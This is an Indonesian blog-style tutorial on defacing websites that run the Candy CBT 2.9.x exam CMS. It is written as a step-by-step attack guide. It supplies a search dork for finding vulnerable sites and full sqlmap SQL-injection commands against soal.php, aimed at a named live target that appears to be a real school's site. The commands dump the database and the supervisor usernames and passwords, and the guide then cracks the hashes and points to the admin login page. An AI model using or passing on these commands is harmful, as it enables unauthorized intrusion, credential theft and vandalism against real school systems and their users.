Cara Deface poc Candy CBT 2022
Hai saya Rakhaa Yonanda, di artikel ini saya akan membagikan sedikit materi tentang deface, nah untuk proof of concept seperti judul ialah cms Candy CBT versi 2.9 keatas. sebelumnya saya terimakasih kepada mas hari telah menemukan exploit untuk versi 2.9 kalian bisa mampir di blog beliau blog mas hari . sebelum kita lanjut gw jelasin sedikit tentang deface yah.
Arti Deface / Defacing pada website
Deface merupakan salah satu kegiatan merubah tampilan suatu website baik itu halaman utama, index file, atau pun halaman lain yang masih terikat dalam satu url dengan website tersebut. Kegiatan ini sendiri kerap disalahgunakan oleh para peretas untuk mengganggu website-website tertentu, tidak menutup kemungkinan dengan website acak.
Exploit Candy CBT 2.9.x
baiklah kita mulai caranya, sebelumnya kita siapkan bahan-bahan nya, disini kita memerlukan bantuan sebuah tools sqlmap dan Tools buat hash passwordnya debcrypt Tools kalian bisa cek di bawah ini.
Download / install sqlmap : LINK
Download / install ToolHash debcrypt : LINK
Nah jika alat tempur sudah siap, kita gas ke cara esekusinya hehe.
dork : intext:Support By X-Candy CBT v2.9.2 r1 (kembangkan lagi di cara ngembangin dork )
Payload: sqlmap.py -u "http://targetnya.sch.id/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -dbs --dbms mysql --thread 10
Live Target : "http://cbt.miamanahruteng.sch.id/
Mulai Ekseskusi
nah kalian ketikan payload kedalam tools sqlmap seperti gambar diatas, atau lebih detailnya seperti ini : python3 sqlmap.py -u ""http://cbt.miamanahruteng.sch.id/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -dbs --dbms mysql --thread 10
maka hasilnya seperti ini :
[*] information_schema
[*] u807586548_cbt_miamanah
muncul nama database nya, karena table dari databasenya adalah pengawas dan isinya username dan password, maka gunakan payload seperti ini :
-D nama_database -T pengawas -C username,password --dump (Ganti -dbs dengan Payload Ini)
karena databse live target kita adalah (u807586548_cbt_miamanah) maka payloadnya adalah :
python3 sqlmap.py -u "http://cbt.miamanahruteng.sch.id/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -D u807586548_cbt_miamanah -T pengawas -C username,password --dump --dbms mysql --thread 10
langsung kita esekusi.
nah, muncul username dan passwordnya. selanjutnya ngapain? ngudud hehe
selanjutnya kita hash passwordnya sambil nyebats nunggu, oke kita gunakan tools yang sudah kita siapkan tadi maka hasilnya seperti ini.
kira" penggunaan toolsnya seperti gambar diatas. untuk halaman loginya adalah :
webnya.com/panel/login/php
mungkin sekian dari saya.
sumber refrensi : https://ecchiexploit.blogspot.com/